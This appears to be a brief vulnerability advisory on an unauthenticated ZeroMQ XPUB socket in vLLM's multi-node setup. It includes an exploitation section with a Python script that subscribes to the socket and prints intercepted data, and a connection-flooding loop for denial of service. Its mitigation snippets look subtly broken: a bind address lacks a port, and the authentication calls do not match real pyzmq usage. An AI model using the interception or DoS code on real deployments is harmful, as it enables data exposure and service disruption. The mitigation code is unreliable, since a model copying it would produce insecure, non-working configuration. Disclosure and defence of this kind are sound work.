Listen to this Post
vLLM uses ZeroMQ for multi-node communication in distributed deployments. The primary host opens an XPUB socket bound to all interfaces, exposing internal state data to any network-accessible client. Attackers can connect to this socket, intercept broadcasted metadata, or cause DoS by spamming connections without reading data. The vulnerability stems from unauthenticated XPUB socket binding in shm_broadcast.py, where `MessageQueue.broadcast_object()` sends tensor metadata via ZeroMQ while relying on `torch.distributed` for actual tensor data.
DailyCVE Form
Platform: vLLM
Version: Multi-node deployments
Vulnerability: ZeroMQ data exposure
Severity: High
Date: 2025-04-29
What Undercode Say:
Exploitation:
1. Identify XPUB Port:
netstat -tulnp | grep zmq
2. Connect to Socket:
import zmq
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect("tcp://<vLLM_HOST>:<PORT>")
socket.setsockopt(zmq.SUBSCRIBE, b"")
while True: print(socket.recv())
3. DoS Attack:
for _ in range(1000):
zmq.Context().socket(zmq.SUB).connect("tcp://<vLLM_HOST>:<PORT>")
Mitigation:
1. Firewall Rules:
iptables -A INPUT -p tcp --dport <PORT> -j DROP
2. ZeroMQ Config: Bind to internal IP:
socket.bind("tcp://192.168.1.100:") Replace with internal IP
3. Auth Layer:
zmq.auth.install_authenticator(context)
server.auth = zmq.AUTH(allow=("trusted_ip",))
Detection:
lsof -i | grep zmq | grep XPUB
Patch Monitoring:
Track updates in:
– `shm_broadcast.py` (ZeroMQ socket binding)
– `parallel_state.py` (broadcast logic)
Debugging:
Log ZeroMQ traffic:
zmq.logger.set_level(zmq.logging.DEBUG)
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
